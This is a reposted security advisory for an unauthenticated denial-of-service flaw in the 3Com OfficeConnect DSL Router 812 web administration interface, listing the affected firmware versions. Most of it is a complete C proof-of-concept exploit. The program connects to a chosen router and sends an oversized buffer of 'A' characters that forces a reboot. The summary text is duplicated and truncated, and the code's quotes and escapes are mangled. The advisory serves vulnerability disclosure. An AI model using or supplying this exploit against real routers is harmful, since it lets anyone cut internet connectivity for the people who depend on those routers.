‘3Com DSL Router Administrative Interface Long Request DoS’

Summary

‘OfficeConnect is a router widely used in the world. The router can be rebooted due to a flaw in its web administration interface. As no authentication is needed, every LAN user can cause a crash and reboot of the router, stopping internet connection for one or two minutes. A remote user can exploit it if the web interface is available in the WAN interface of the router or if he can persuade a user to click on a link in a forum or to visit a webpage (as you can always access the web interface if the connection is local initiated, as is from the web browser).OfficeConnect is a router widely used in the world. The router can be rebooted due to a flaw in its web administration interface. As no authentication is needed, every LAN user can cause a crash and reboot of the router, stopping internet connection for one or two minutes. A remote user can exploit it if the web interface is available in the WAN interface of the router or if he can persuade a user to click on a li!’

Credit:

‘The information has been provided by Shaun Colley.’


Details

Vulnerable Systems:
 * 3Com OfficeConnect DSL Router 812 1.1.7
 * 3Com OfficeConnect DSL Router 812 1.1.9
 * 3Com OfficeConnect DSL Router 812 2.0

Exploit:
/* 3com-DoS.c
 *
 * PoC DoS exploit for 3Com OfficeConnect DSL Routers.
 * discovered by David F. Madrid.
 *
 * Successful exploitation of the vulnerability should cause the router to
 * reboot. It is not believed that arbitrary code execution is possible –
 * check advisory for more information.
 *
 * -shaun2k2
 */
 

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

int main(int argc, char *argv[]) {
 if(argc < 3) {
  printf(‘3Com OfficeConnect DSL Router DoS exploit by shaun2k2 – < shaunige@yahoo.co.uk>nn’);
  printf(‘Usage: 3comDoS < 3com_router> < port>n’);
  exit(-1);
 }

 int sock;
 char explbuf[521];
 struct sockaddr_in dest;
 struct hostent *he;

 if((he = gethostbyname(argv[1])) == NULL) {
  printf(‘Couldn’t resolve %s!n’, argv[1]);
  exit(-1);
 }

 if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  perror(‘socket()’);
  exit(-1);
 }

 printf(‘3Com OfficeConnect DSL Router DoS exploit by shaun2k2 – < shaunige@yahoo.co.uk>nn’);
 
 dest.sin_addr = *((struct in_addr *)he->h_addr);
 dest.sin_port = htons(atoi(argv[2]));
 dest.sin_family = AF_INET;

 printf(‘[+] Crafting exploit buffer.n’);
 memset(explbuf, ‘A’, 512);
 memcpy(explbuf+512, ‘nnnnnnnn’, 8);

 if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
  perror(‘connect()’);
  exit(-1);
 }

 printf(‘[+] Connected…Sending exploit buffer!n’);
 send(sock, explbuf, strlen(explbuf), 0);
 sleep(2);
 close(sock);
 printf(‘n[+] Exploit buffer sent!n’);
 return(0);
}’

Categories: Exploits